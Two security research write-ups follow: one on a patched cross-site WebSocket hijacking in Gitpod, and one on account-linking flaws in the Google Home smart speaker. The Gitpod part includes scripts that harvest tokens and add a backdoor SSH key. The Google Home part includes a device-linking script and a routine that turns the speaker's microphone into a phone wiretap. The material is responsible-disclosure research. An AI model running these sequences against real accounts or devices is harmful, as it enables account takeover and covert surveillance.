Gitpod remote code execution 0-day vulnerability via WebSockets

Original text by Elliot Ward

TLDR

This article walks us through a current Snyk Security Labs research project focusing on cloud-based development environments (CDEs) — which resulted in a full workspace takeover on the Gitpod platform and extended to the user’s SCM account. The issues here have been responsibly disclosed to Gitpod and were resolved within a single working day!

Cloud development environments and Gitpod

As more and more companies begin to leverage cloud-based development environments for benefits such as improved performance, developer experience, consistent development environments, and low setup times, we couldn’t help but wonder about the security implications of adopting these cloud-based IDEs.

First, let’s provide a brief overview of how CDEs operate so we can understand the difference between cloud-based and traditional, local-workstation based development — and how it changes the developer security landscape.

In contrast to traditional development, CDEs run on a cloud hosted machine with an IDE backend. This typically provides a web application version of the IDE and support for integrating with a locally installed IDE over SSH, giving users a seamless and familiar experience. When using a CDE, the organization’s code and any supporting services, such as a development database, are hosted within the cloud. Check out the following diagram for a visual representation of information flow in a CDE.

The security risks of locally installed development environments are not new. However, they historically haven’t received much attention from developers. In May 2021, Snyk disclosed vulnerable VS Code extensions that led to a 1-click data leak or arbitrary command execution. These traditional workstation-based development environments, such as a local instance of VS Code or IntelliJ, carry other information security concerns — including hardware failure, data security, and malware. While these concerns can be addressed by employing Full Disk Encryption, version control, backups, and anti-malware systems, many questions remain unanswered with the adoption of cloud-based development environments:

  • What happens if a cloud IDE workspace is infected with malware?
  • What happens when access controls are insufficient and allow cross-user or even cross-organization access to workspaces?
  • What happens when a rogue developer exfiltrates company intellectual property from a cloud-hosted machine outside the visibility of the organization’s data loss prevention or endpoint security software?

In a current security research project here at Snyk, we examine the security implications of adopting cloud-based IDEs. In this article, we present a case study of one of the vulnerabilities discovered during our initial exploration of the Gitpod platform.

Examining the Gitpod platform

Disclaimer: When it came to looking at cloud IDE solutions for our research, we settled on either self-hosted or cloud-based solutions, where the vendor has a clearly defined security policy providing safe harbor for researchers. 

One of the most popular CDEs is Gitpod. Its wide adoption and extended feature set — including automated backups, Git integration out of the box, and multiple IDE backends — ensured that Gitpod was among the first products we looked into.

The first stage of our research involved becoming familiar with the basic workflows of Gitpod, setting up an organization, and experimenting with the product while capturing traffic using Burp Suite to observe the various APIs and transactions. We then pulled the Gitpod source code from GitHub to study the inner workings of its APIs, and reviewed any relevant architecture documentation to better understand each of the components and their function. A great resource for this was a video that provided an initial deep dive into the architecture of Gitpod. At a high level, Gitpod leverages multiple microservices deployed in a Kubernetes environment, where each user workspace is deployed to a dedicated ephemeral pod.

Gitpod’s primary set of external components are concerned with the dashboard, authentication, and the creation and management of workspaces, organizations, and accounts. At its core, the main component here is aptly named server, a TypeScript application that exposes a JSONRPC API over WebSocket that is consumed by a React frontend called dashboard.

From the dashboard, it’s easy to integrate with an SCM provider, such as GitHub or Bitbucket, to import a repository and spin up a development environment — which then serves the source code and provides a working Git environment. Once the workspace is provisioned, it is made accessible via SSH and HTTPS on a subdomain of gitpod.io (i.e. https://[WORKSPACE_NAME].[CLUSTER_NAME].gitpod.io) through a Golang-based component called ws-proxy.

The security vulnerability that was discovered through our research relates primarily to the server component and the JSONRPC served over a WebSocket connection, which ultimately led to a workspace takeover in Gitpod.

Technical details

WebSockets and Same Origin Policy

WebSocket is a technology that allows for real-time, two-way communication between a client (typically a web browser) and a server. It enables a persistent connection between the client and server, allowing for continuous “real-time” data transfer without the need for repeated HTTP requests. 

An interesting aspect of WebSockets from a security perspective is that a browser security mechanism, the Same Origin Policy (SOP), does not apply. This is the security control that prevents a website from issuing an AJAX request to another website and being able to read the response. If this were possible, it would present a security concern because browsers typically submit cookies along with every request (even for cross-origin requests, such as CSRF-related attacks). Without SOP, any website would be able to issue requests to foreign websites and obtain your data from other domains.

This leads us to the vulnerability class known as Cross-Site WebSocket Hijacking. This attack is similar to a combination of a Cross-Site Request Forgery and CORS misconfiguration. When a WebSocket handshake relies solely upon HTTP cookies for authentication, a malicious website is able to instantiate a new WebSocket connection to the vulnerable application, allowing an attacker to both send and receive data through the connection.

When reviewing an application with WebSocket connections, it’s always worth examining this in depth. Let’s take a look at the WebSocket request for the Gitpod server.

In normal circumstances, the connection is successfully upgraded to a WebSocket and communication begins. There was no additional authentication taking place within the WebSocket exchange itself, and the JSONRPC can be invoked via the WebSocket connection.

So far, we’ve found no additional authentication taking place within the established channel — a good sign for any potential attackers. Now, let’s verify that no additional Origin checks are taking place by taking a handshake we have observed and tampering with the Origin header.
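
Outside of Burp, the same check can be scripted. Here’s a minimal sketch using the Python websocket-client package (the endpoint path and cookie name are assumptions based on our captured handshake, not Gitpod documentation):

import websocket  # pip install websocket-client

# Replay the observed handshake with a forged Origin header. If the server
# ignores the Origin, the upgrade succeeds even though we claim to be evil.com.
ws = websocket.create_connection(
    "wss://gitpod.io/api/v1",        # assumed JSONRPC WebSocket endpoint
    origin="https://evil.com",       # forged Origin header
    cookie="_gitpod_io_=<session>",  # victim session cookie (name illustrative)
)
print(ws.connected)  # True means no server-side Origin check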

This looks promising! It seems that the domain evil.com is able to issue Cross-Origin WebSocket requests to gitpod.io. However, another security mechanism introduces a challenge.

SameSite Cookie bypass

SameSite cookies are a fairly recent addition, providing partial mitigation against Cross-Site Request Forgery (CSRF) attacks. While not everyone has adopted them, most popular browsers now treat any cookie that does not explicitly set a SameSite attribute as Lax. So while the underlying vulnerability is present, without a bypass for SameSite cookies our attack would largely be theoretical and only work against a subset of outdated and niche browsers.

So what is a site in the context of SameSite? Simply put, the site corresponds to the combination of the scheme and the registrable domain (if any) of the origin’s host. If we look at the specification for SameSite, we can see that subdomains are not considered. This is more relaxed than the definition of an origin used by the Same Origin Policy, which comprises the scheme + host (including subdomains) + port (e.g. https://security.snyk.io:8443).

Earlier, we observed that the workspace was exposed via a subdomain on gitpod.io. In the context of SameSite, the workspace URL is considered to be the same site as gitpod.io. So, it should be possible for one workspace to issue a cross-domain SameSite request to a *.gitpod.io domain with the original user’s cookies attached. Let’s see if we can leverage an attacker-controlled workspace to serve a WebSocket Hijacking payload.
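
To make the “site” computation concrete, here’s a quick check with the Python tldextract package (the workspace hostname is illustrative):

import tldextract  # pip install tldextract

# SameSite compares the registrable domain (eTLD+1), not the full origin.
workspace = tldextract.extract("https://mylegitworkspace.ws-eu42.gitpod.io")
dashboard = tldextract.extract("https://gitpod.io")
print(workspace.registered_domain)  # gitpod.io
print(workspace.registered_domain == dashboard.registered_domain)  # True: same site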

To first verify that the cookies are indeed transmitted and the WebSocket communication is successfully achieved, let’s open the browser console from a workspace and attempt to initiate a WebSocket connection.

As we can see in the above screenshot, we attempt to open a new WebSocket connection and, once open, submit a JSONRPC request. We can see in the console output that a message has been received containing the result of our request, confirming that the cookies are submitted and the origin is permitted to open a WebSocket to gitpod.io.

We now need a way to serve JavaScript from the workspace that can be accessed by a Gitpod user. Looking through the features available, it is possible to expose ports in the workspace and make them accessible using a command line utility called gitpod-cli — available on the path inside the workspace by typing gp. We can invoke gp ports expose 8080, and then set up a basic Python web server using python -m http.server 8080. This in turn creates a new subdomain where the exposed port can be accessed, as shown below.

However, the connection failed. This was somewhat concerning and required more investigation. We opened the source code and started looking for what could be causing the problem, and found the following regular expression pattern, which appears to be used to extract the workspace name from the URL.

The way this matching is performed results in the wrong workspace name being extracted, as demonstrated in the following screenshot:

So it looks like we can’t serve our content from an exposed port inside the Gitpod-hosted workspace, and we need another way. By now we already know that we have privileged access to a machine that’s running the VS Code service and is serving requests issued to our workspace URL — so can we abuse this in some way?

The initial idea was to terminate the vscode process and start a Python web server to serve an HTML file. Unfortunately, this did not work and resulted in the workspace being restarted; this appeared to be performed by a local service, supervisor. While testing this approach, we noticed that when we terminated the process without binding another process to the VS Code port, the supervisor service would automatically restart the vscode process, resulting in a brief hang of the UI without a full restart of the workspace.

This gave us a promising idea: could we patch VS Code to serve a built-in exploit for us?

Patching VS Code was relatively easy. By comparing the original VS Code server source code to the distributed version, we quickly found a convenient location to serve the exploit.

VS Code contains an API endpoint at /version, which returns the commit of the current version:

We modified it so that the correct Content-Type of text/html and the contents of an HTML file were returned. Now, we terminated the vscode process, allowing our newly introduced changes to load into a newly spawned VS Code process instance:

Finally, we can leverage the JSONRPC methods getLoggedInUser, getGitpodTokens, getOwnerToken, and addSSHPublicKey to build a payload that grants us full control over the user’s workspaces when an unsuspecting Gitpod user visits our link!
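
The payload itself is JavaScript running in the victim’s browser, but the JSONRPC sequence it performs can be sketched as follows; the method names are the ones above, while the endpoint path and parameter shapes are assumptions based on our captures:

import json
import websocket  # pip install websocket-client

def rpc(ws, rpc_id, method, params):
    # server speaks JSONRPC 2.0 over the WebSocket connection
    ws.send(json.dumps({"jsonrpc": "2.0", "id": rpc_id, "method": method, "params": params}))
    return json.loads(ws.recv())

# In the real attack, the victim's browser opens this connection and the
# cookies ride along automatically; here we attach a captured cookie instead.
ws = websocket.create_connection("wss://gitpod.io/api/v1", cookie="_gitpod_io_=<session>")

user = rpc(ws, 1, "getLoggedInUser", [])                 # identify the victim
tokens = rpc(ws, 2, "getGitpodTokens", [])               # harvest API tokens
owner = rpc(ws, 3, "getOwnerToken", ["<workspace-id>"])  # per-workspace owner token
rpc(ws, 4, "addSSHPublicKey", [{"name": "backdoor",      # persist SSH access
                                "key": "ssh-ed25519 AAAA... attacker"}])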

Here it is in action:

We can see that we’ve been able to extract some sensitive information about the user account, and are notified that our SSH key has been added to the account. Let’s see if we can SSH to the workspace:

Mission successful! As shown above, we have full access to the user’s workspaces after they’ve visited a link we sent them!

Timeline

  • Mon, Feb. 13, 2023 — Vulnerability disclosed to vendor
  • Mon, Feb. 13, 2023 — Vendor acknowledges vulnerability
  • Tue, Feb. 14, 2023 — New version released and deployed to production SaaS Gitpod instance
  • Wed, Feb. 22, 2023 — CVE-2023-0957 assigned
  • Wed, Mar. 1, 2023 — Vendor releases new version for Gitpod Self-Hosted and issues advisory

Summary

In this post, we presented the first findings from our current research into Cloud Development Environments (CDEs) — which allowed a full account takeover through visiting a link, exploiting a commonly misunderstood vulnerability (WebSocket Hijacking), and leveraging a practical SameSite cookie bypass. As cloud developer workspaces are becoming increasingly popular, it’s important to consider the additional risks that are introduced.

We would like to praise Gitpod for their fantastic turnaround on addressing this security vulnerability, and look forward to presenting more of our findings on cloud-based remote development solutions in the near future.

Turning Google smart speakers into wiretaps for $100k

Original text by Matt Kunze

Summary

I was recently rewarded a total of $107,500 by Google for responsibly disclosing security issues in the Google Home smart speaker that allowed an attacker within wireless proximity to install a “backdoor” account on the device, enabling them to send commands to it remotely over the Internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN (which could potentially expose the Wi-Fi password or provide the attacker direct access to the victim’s other devices). These issues have since been fixed.

(Note: I tested everything on a Google Home Mini, but I assume that these attacks worked similarly on Google’s other smart speaker models.)

Investigation

I was messing with the Google Home and noticed how easy it was to add new users to the device from the Google Home app. I also noticed that linking your account to the device gives you a surprising amount of control over it.

Namely, the “routines” feature allows you to create shortcuts for running a series of other commands (e.g. a “good morning” routine that runs the commands “turn off the lights” and “tell me about the weather”). Through the Google Home app, routines can be configured to start automatically on your device on certain days at certain times. Effectively, routines allow anyone with an account linked to the device to send it commands remotely. In addition to remote control over the device, a linked account also allows you to install “actions” (tiny applications) onto it.

When I realized how much access a linked account gives you, I decided to investigate the linking process and determine how easy it would be to link an account from an attacker’s perspective.

So… how would one go about doing that? There are a bunch of different routes to explore when reverse engineering an IoT device, including (but not limited to):

  1. Obtaining the device’s firmware by dumping it or downloading it from the vendor’s website
  2. Static analysis of the app that interfaces with the device (in this case, the “Google Home” Android app), e.g. using Apktool or JADX to decompile it
  3. Dynamic analysis of the app during runtime, e.g. using Frida to hook Java methods and print info about internal state
  4. Intercepting the communications between the app and the device (or between the app/device and the vendor’s servers) using a “man-in-the-middle” (MITM) attack

Obtaining firmware is particularly difficult in the case of Google Home because there are no debugging/flashing pins on the device’s PCB, so the only way to read the flash is to desolder the NAND chip. Google also does not publicly provide firmware image downloads. As shown at DEFCON though, it is possible.

However, in general, when reverse engineering things, I like to start with a MITM attack if possible, since it’s usually the most straightforward path to gaining some insight into how the thing works. Typically IoT devices use standard protocols like HTTP or Bluetooth for communicating with their corresponding apps. HTTP in particular can be easily snooped using tools like mitmproxy. I love mitmproxy because it’s FOSS, has a nice terminal-based UI, and provides an easy-to-use Python API.

Since the Google Home doesn’t have its own display or user interface, most of its settings are controlled through the Google Home app. A little Googling revealed that some people had already begun to document the local HTTP API that the device exposes for the Google Home app to use. Google Cast devices (including Google Homes and Chromecasts) advertise themselves on the LAN using mDNS, so we can use dns-sd to discover them:

$ dns-sd -B _googlecast._tcp
Browsing for _googlecast._tcp
DATE: ---Fri 05 Aug 2022---
15:30:15.526  ...STARTING...
Timestamp     A/R    Flags  if Domain               Service Type         Instance Name
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Chromecast-997113e3cc9fce38d8284cee20de6435
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Nest-Hub-d5d194c9b7a0255571045cbf615f7ffb
15:30:15.527  Add        3   6 local.               _googlecast._tcp.    Google-Home-Mini-f09088353752a2e56bddbb2a27ec377
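
The same discovery is easy to script; here’s a rough sketch using the python-zeroconf package (my own substitution for dns-sd):

from zeroconf import ServiceBrowser, Zeroconf  # pip install zeroconf

class CastListener:
    def add_service(self, zc, type_, name):
        # resolve the advertised service to its LAN address(es)
        info = zc.get_service_info(type_, name)
        if info:
            print(name, info.parsed_addresses())
    def update_service(self, zc, type_, name):
        pass
    def remove_service(self, zc, type_, name):
        pass

zc = Zeroconf()
ServiceBrowser(zc, "_googlecast._tcp.local.", CastListener())
input("Browsing for Cast devices, press Enter to stop...\n")
zc.close()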

We can use nmap to find the port that the local HTTP API is running on:

$ nmap 192.168.86.29
Starting Nmap 7.91 ( https://nmap.org ) at 2022-08-05 15:41
Nmap scan report for google-home-mini.lan (192.168.86.29)
Host is up (0.0075s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
8008/tcp  open  http
8009/tcp  open  ajp13
8443/tcp  open  https-alt
9000/tcp  open  cslistener
10001/tcp open  scp-config

We see HTTP servers on ports 8008 and 8443. According to the unofficial documentation I linked above, 8008 is deprecated and only 8443 works now. (The other ports are for Chromecast functionality, and some unofficial documentation for those is available elsewhere on the Internet.) Let’s try issuing a request:

$ curl -s --insecure https://192.168.86.29:8443/setup/eureka_info?params=settings
{"settings":{"closed_caption":{},"control_notifications":1,"country_code":"US","locale":"en-US","network_standby":0,"system_sound_effects":true,"time_format":1,"timezone":"America/Chicago","wake_on_cast":1}}

(We use --insecure because the device sends a self-signed certificate, which the Google Home app is configured to trust, but my computer is not.)

Ok, we got the device’s settings. However, the docs say that most API endpoints require a cast-local-authorization-token. Let’s try something more interesting and reboot the device:

$ curl -i --insecure -X POST -H 'Content-Type: application/json' -d '{"params":"now"}' https://192.168.86.29:8443/setup/reboot
HTTP/1.1 401 Unauthorized
Access-Control-Allow-Headers:Content-Type
Cache-Control:no-cache
Content-Length:0

Indeed, it’s rejecting the request because we’re not authorized. So how do we get the token? Well, the docs say that you can either extract it from the Google Home app’s private app data directory (if your phone is rooted), or you can use a script that takes your Google username and password as input, calls the API that the Google Home app internally uses to get the token, and returns the token. Both of these methods require that you have an account that’s already been linked to the device, though, and I wanted to figure out how the linking happens in the first place. Presumably, this token is being used to prevent an attacker (or malicious app) on the LAN from accessing the device. Therefore, it surely takes more than just basic LAN access to link an account and get the token, right…? I searched the docs but there was no mention of account linking. So I proceeded to investigate the matter myself.

Setting up the proxy

Intercepting unencrypted HTTP traffic with mitmproxy on Android is as simple as starting the proxy server then configuring your phone (or just the target app) to route all of its traffic through the proxy. However, the unofficial local API documentation said that Google had recently started using HTTPS. Also, I wanted to be able to intercept not only the traffic between the app and the Google Home device, but also between the app and Google’s servers (which is definitely HTTPS). I thought that since the linking process involved Google accounts, parts of the process might happen on the Google server, rather than on the device.

Intercepting HTTPS traffic on Android is a little trickier, but usually not terribly difficult. In addition to configuring the proxy settings, you also need to make the app trust mitmproxy’s root CA certificate. You can install new CAs through Android Settings, but annoyingly, as of Android 7, apps using the system-provided networking APIs will no longer automatically trust user-added CAs. If you have a rooted Android phone, you can modify the system CA store directly (located at /system/etc/security/cacerts). Alternatively, you could manually patch the individual app. However, sometimes even that isn’t enough, as some apps employ “SSL pinning” to ensure that the certificate used for SSL matches the one they were expecting. If the app uses the system-provided pinning APIs (javax.net.ssl) or uses a popular HTTP library (e.g. OkHttp), it’s not hard to bypass: just hook the relevant methods with Frida or Xposed. While Xposed and the full version of Frida both require root, Frida Gadget can be used without root. If the app is using a custom pinning mechanism, you’ll have to reverse engineer it and manually patch it out.

Patching and repacking the Google Home app isn’t an option because it uses Google Play Services OAuth APIs (which means the APK needs to be signed by Google or it’ll crash), so root access is necessary to intercept its traffic. Since I didn’t want to root my primary phone, and emulators tend to be clunky, I decided to use an old spare phone I had lying around. I rooted it using Magisk and modified the system CA store to include mitmproxy’s CA, but this wasn’t sufficient as the Google Home app appeared to be utilizing SSL pinning. To bypass the pinning, I used a Frida script I found on GitHub.

I could now see all of the encrypted traffic showing up in mitmproxy:

Even the traffic between the app and device was being captured. Cool!

Alright, so let’s observe what happens when a new user links their account to the device. I already had my primary Google account linked, so I created a new account as the “attacker”. When I opened the Google Home app and signed in under the new account (making sure I was connected to the same Wi-Fi network as the device), the device showed up under “Other devices”, and when I tapped on it, I was greeted with this screen:

I pressed the button and it prompted me to install the Google Search app to continue. I guess the Voice Match setup is done through that app instead. But as an attacker I don’t care about adding my voice to the device; I only want to link my account. So is it possible to link an account without Voice Match? I thought that it must be, since the initial device setup was done entirely within the Home app, and I wasn’t required to enable Voice Match on my primary account. I was about to perform a factory reset and observe the initial account link, but then I realized something.

Much of the internal architecture of Google Home is shared with Chromecast devices. According to a DEFCON talk, Google Home devices use the same operating system as Chromecasts (a version of Linux). The local API seems to be similar, too. In fact, the Home app’s package name ends with chromecast.app, and it used to just be called “Chromecast”. Back then, its only function was to set up Chromecast devices. Now it’s responsible for setting up and managing not just Chromecasts, but all of Google’s smart home devices.

Anyway, why not just try observing how the Chromecast link process works, then try to replicate it for use with the Google Home? It’s bound to be simpler, because Chromecasts don’t support Voice Match (nor the Google Assistant, for that matter). Luckily, I also had a few Chromecasts lying around. I plugged in one and found it within the Home app:

All I had to do was tap the “Enable voice control and more” banner and confirm, and then my account was linked! Ok, let’s see what happened on the network side:

We see a POST request to a /deviceuserlinksbatch endpoint on clients3.google.com:

It’s a binary payload, but we can immediately see that it contains some device details (e.g. the device’s name, “Office TV”). We see that the content-type is application/protobuf. Protocol Buffers is Google’s binary data serialization format. Like JSON, data is stored in pairs of keys and values. The client and server exchanging protobuf data both have a copy of the .proto file, which defines the field names and data types (e.g. uint32, bool, string, etc.). During the encoding process, this data is stripped out, and all that remains are the field numbers and wire types. Fortunately, the wire types translate pretty directly back to the original data types (there are usually only a few possibilities as to what the original data type could have been, based on the wire type). Google provides a command-line tool called protoc that allows us to encode and decode protobuf data. The --decode_raw option tells protoc to decode without the .proto file by guessing what the data types are. This raw decoding is usually enough to understand the data structure, but if it doesn’t look right, you can create your own .proto with your data type guesses, try to decode, and if it still doesn’t make sense, keep adjusting the .proto until it does.

In our case, --decode_raw produces a perfectly readable output:

$ protoc --decode_raw < deviceuserlinksbatch
1 {
  1: "590C[...]"
  2: "MIIDojCCAoqgAwIBAgIEVcQZjzANBgkqhkiG9w0BAQUFADB5MQswCQYDVQQGEwJVUzETMBEGA1UECAwKQ2FsaWZvcm5pYTEWMBQGA1UEBwwNTW91bnRhaW4gVmlldzETMBEGA1UECgwKR29vZ2xlIEluYzENMAsGA1UECwwEQ2FzdDEZMBcGA1UEAwwQQ2hyb21lY2FzdCBJQ0EgMzAeFw0xNTA4MDcwMjM1NTlaFw0zNTA4MDIwMjM1NTlaMHwxEzARBgNVBAoMCkdvb2dsZSBJbmMxDTALBgNVBAsMBENhc3QxFjAUBgNVBAcMDU1vdW50YWluIFZpZXcxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRwwGgYDVQQDDBMzVzM3OTkgRkE4RkNBMzJDRjBEMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAleog/oEXK6PKyGHDIYcDwT2Xl8GLOFuhxQh/K+dTahxex9+4mLAXx5v2s75Iwv9jcXEpD5NTvjNXx20B0/rfpYORHbcm3UEwFWGnP5uvKIyLar+rC7Az5ZPzPXMx7xX6Br68/gOXMGJd17OG/m0rduBZNjmasBb7+Zu8jS38cv+N3S7yTobJbagrHxIufa7gX+rO2f3/jF2EutgcA4lIm5r/2J34fkYTMXnxElJCUv/b1COuk0FZTei4mooJ+TvcQE2ljgHOSvzGnZuT+QWch8TyRjIjKuIK4dB1UIcSvmQoq9PTbfzWCTcW1fREdPtnta6pyWIzmoJ9+3AhVnWAhwIDAQABoy8wLTAJBgNVHRMEAjAAMAsGA1UdDwQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjANBgkqhkiG9w0BAQUFAAOCAQEAv11SILN9BfcUthEFq/0NJYnNIFoza21T1BR9qYymFKtUGOplFav00drHziTzUUCNUzbLGnR/yKXxXYlgUOlscEIHxN0+11tvWslHQk7Xgz2RUerBXy9l+vSwp87F8YVECny8lMFZi0T6hHUvtuM6O9qovQKS6ORx3GmZKlNOsNspPnF8IVpN+KtIiopL6vf84iCpbx+dQoOfUOZsbZ+XSxwT34yeNFXqdAIFwP1maMmPZZYnQrDYyUdyowYzk48fDG2QDhFf7dLjtCngcQ83MWWU5nx9On67hnj2VeFGKWsner4cwjs0+iVafUGiWD0tZejVXHSrR7TBouqOf9eG6Q=="
  6: "Office TV"
  7: "b"
  8: 0
  9 {
    1: 1
    2: 0
  }
  10: 2
  12: 0
}

Looks like the link request payload mainly consists of three things: device name, certificate, and “cloud ID”. I quickly recognized these values from the earlier /setup/eureka_info local API requests. So it appears that the link process is:

  1. Get the device’s info through its local API
  2. Send a link request to the Google server along with this info

I wanted to use mitmproxy to re-issue a modified version of the request, replacing my Chromecast’s info with the Google Home’s info. I would eventually want to create a .proto file so I could use protoc --encode to create link requests from scratch, but at that point I just wanted to quickly test to see if it would work. I figured I could replace any strings in the binary payload without causing any problems as long as they were the same length. The cloud ID and cert were the same lengths, but the name (“Office speaker”) was not, so I renamed the device in the Home app to make it that way. Then I issued the modified request, and it appeared to work. The Google Home’s settings were unlocked in the Home app. Behind the scenes, I saw in mitmproxy that the device’s local auth token was being sent along with local API requests.

Python re-implementation

The next thing I wanted to do was re-implement the link process with a Python script so I didn’t have to bother with the Home app any more.

To get the required device info, we just need to issue a request like:

GET https://[Google Home IP]:8443/setup/eureka_info?params=name,device_info,sign

Re-implementing the actual link request was a tad harder. First I examined the script mentioned by the unofficial local API docs that calls Google’s cloud APIs. It uses a library called gpsoauth which implements Android’s Google login flow in Python. Basically, it turns your Google username and password into OAuth tokens, which can be used to call undocumented Google APIs. It’s being used by some unofficial Python clients for Google services, like gkeepapi for Google Keep.
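
The token exchange looks roughly like this; it’s a sketch, and the service/app/signature strings are assumptions modeled on those community scripts:

import gpsoauth  # pip install gpsoauth

EMAIL, PASSWORD = "attacker@gmail.com", "hunter2"
ANDROID_ID = "0123456789abcdef"  # any stable dummy device ID

# Step 1: username/password -> long-lived "master token"
master = gpsoauth.perform_master_login(EMAIL, PASSWORD, ANDROID_ID)
master_token = master["Token"]

# Step 2: master token -> short-lived OAuth token for a specific app/service.
# These three strings identify the Google Home app; the values are assumptions.
oauth = gpsoauth.perform_oauth(
    EMAIL, master_token, ANDROID_ID,
    service="oauth2:https://www.google.com/accounts/OAuthLogin",
    app="com.google.android.apps.chromecast.app",
    client_sig="24bb24c05e47e0aefa68a58a766179d9b613a600",
)
access_token = oauth["Auth"]  # becomes the "Authorization: Bearer ..." header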

I used mitmproxy and gpsoauth to figure out and re-implement the link request. It looks like this:

POST https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b

Authorization: Bearer [token from gpsoauth]
[...some uninteresting headers added by the Home app...]
Content-Type: application/protobuf

[device info protobuf payload, described earlier]

To create the protobuf payload, I made a simple .proto file for the link request so I could use protoc --encode. I gave the fields I knew descriptive names (e.g. device_name), and the unknown fields generic names:

syntax = "proto2";

message LinkDevicePayload {
    message Payload {
        message Data {
            required uint32 i1 = 1;
            required uint32 i2 = 2;
        }
        required string device_id = 1;
        required string device_cert = 2;
        required string device_name = 6;
        required string s7 = 7;
        required uint32 i8 = 8;
        required Data d = 9;
        required uint32 i10 = 10;
        required uint32 i12 = 12;
    }
    required Payload p = 1;
}

As a basic smoke test, I used this .proto to encode a message with the same values as the message I captured from the Home app, and made sure that the binary output was the same.

Putting it all together, I had a Python script that takes your Google credentials and an IP address as input and uses them to link your account to the Google Home device at the provided IP.
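
Condensed, the script does something like the following sketch, assuming link.proto contains the message definition shown above and access_token comes from the gpsoauth step; the constant field values mirror my capture:

import subprocess
import requests  # pip install requests

access_token = "..."  # Bearer token from the gpsoauth step above
IP = "192.168.86.29"  # the Google Home's LAN IP

# 1. Pull the device info from the local API (self-signed cert, so verify=False).
info = requests.get(
    f"https://{IP}:8443/setup/eureka_info",
    params={"params": "name,device_info,sign"},
    verify=False,
).json()

# The captured payload carried the bare base64 certificate body, so strip the
# PEM header/footer and newlines (an assumption based on my capture).
cert = "".join(l for l in info["sign"]["certificate"].splitlines()
               if "CERTIFICATE" not in l)

# 2. Render the text-format message and encode it with protoc and link.proto.
text = (
    'p {\n'
    f'  device_id: "{info["device_info"]["cloud_device_id"]}"\n'
    f'  device_cert: "{cert}"\n'
    f'  device_name: "{info["name"]}"\n'
    '  s7: "b"\n'
    '  i8: 0\n'
    '  d { i1: 1 i2: 0 }\n'
    '  i10: 2\n'
    '  i12: 0\n'
    '}\n'
)
payload = subprocess.run(
    ["protoc", "--encode=LinkDevicePayload", "link.proto"],
    input=text.encode(), capture_output=True, check=True,
).stdout

# 3. Fire the link request at the cloud endpoint.
r = requests.post(
    "https://clients3.google.com/cast/orchestration/deviceuserlinksbatch?rt=b",
    headers={"Authorization": f"Bearer {access_token}",
             "Content-Type": "application/protobuf"},
    data=payload,
)
print(r.status_code)  # 200 suggests the account was linked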

Further investigation

Now that I had my Python script, it was time to think from the perspective of an attacker. Just how much control over the device does a linked account give you, and what are some potential attack scenarios? I first targeted the routines feature, which allows you to execute voice commands on the device remotely. Doing some more research into previous attacks on Google Home devices, I encountered the “Light Commands” attack, which provided some inspiration for coming up with commands that an attacker might use:

  • Control smart home switches
  • Open smart garage doors
  • Make online purchases
  • Remotely unlock and start certain vehicles
  • Open smart locks by stealthily brute-forcing the user’s PIN

I wanted to go further though and come up with an attack that would work on all Google Home devices, regardless of how many other smart devices that the user has. I was trying to come up with a way to use a voice command to activate the microphone and exfiltrate the data. Perhaps I could use voice commands to load an application onto the device which opens the microphone? Looking at the “conversational actions” docs, it seemed possible to create an app for the Google Home and then invoke it on a linked device using the command “talk to my test app”. But these “apps” can’t really do much. They don’t have access to the raw audio from the microphone; they only get a transcription of what the user says. They don’t even run on the device itself. Rather, the Google servers talk to your app via webhooks on the device’s behalf. The “smart home actions” seemed more interesting, but that’s something I explored later.

All of a sudden it hit me: these devices support a “call [phone number]” command. You could effectively use this command to tell the device to start sending data from its microphone feed to some arbitrary phone number.

Creating malicious routines

The interface for creating a routine within the Google Home app looks like this:

With the help of mitmproxy, I learned that this is actually just a WebView that embeds the website https://assistant.google.com/settings/routines, which loads fine in a normal web browser (as long as you’re logged in to a Google account). This made reverse engineering it a little easier.

I created a routine to execute the command “call [my phone number]” on Wednesdays at 8:26 PM (it was currently a Wednesday, at 8:25 PM). For routines that run automatically at certain times, you need to specify a “device for audio” (a device to run the routine on). You can choose from a list of devices linked to your account:

A minute later, the routine executed on my Google Home, and it called my phone. I picked up the phone and listened to myself talking through the Google Home’s microphone. Pretty cool!

(Later through inspecting network requests, I found that you can specify not only the hour and minute to activate the routine at, but also the precise second, which meant I only had to wait a few seconds for my routines to activate, rather than about a minute.)

An attack scenario

I had a feeling that Google didn’t intend to make it so easy to access the microphone feed on the Google Home remotely. I quickly thought of an attack scenario:

Attacker wishes to spy on victim.

  1. Victim installs attacker’s malicious Android app.
  2. App detects a Google Home on the network via mDNS.
  3. App uses the basic LAN access it’s automatically granted to silently issue the two HTTP requests necessary to link the attacker’s account to the victim’s device (no special permissions necessary).

Attacker can now spy on the victim through their Google Home.

This still requires social engineering and user interaction, though, which isn’t ideal from an attacker’s perspective. Can we make it cooler?

From a more abstract point of view, the combined device information (name, cert, and cloud ID) basically acts as a “password” that grants remote control of the device. The device exposes this password over the LAN through the local API. Are there other ways for an attacker to access the local API?

In 2019, “CastHack” made the news, as it was discovered that thousands of Google Cast devices (including Google Homes) were exposed to the public Internet. At first it was believed that the issue was these devices’ use of UPnP to automatically open ports on the router related to casting (8008, 8009, and 8443). However, it appears that UPnP is only used by Cast devices for local discovery, not for port forwarding, so the likely cause was a widespread networking misconfiguration (that might be related to UPnP somehow).

The people behind CastHack didn’t realize the true level of access that the local API provides (if combined with cloud APIs):

What can hackers do with this?

Remotely play media on your device, rename your device, factory reset or reboot the device, force it to forget all wifi networks, force it to pair to a new bluetooth speaker/wifi point, and so on.

(These are all local API endpoints, documented by the community already. This was also before the local API started requiring an auth token.)

What CAN’T hackers do with this?

Assuming the Chromecast/Google Home is the only problem you have, hackers CANNOT access other devices on the network or sniff information besides WIFI points and Bluetooth devices. They also don’t have access to your personal Google account, nor the Google Home’s microphone.

There are services like Shodan that allow you to scan the Internet for open ports and vulnerable devices. I was able to find hundreds of Cast devices with port 8443 (local API) publicly exposed using some simple search queries. I didn’t pursue this for very long though, because ultimately bad router configuration is not something Google can fix.

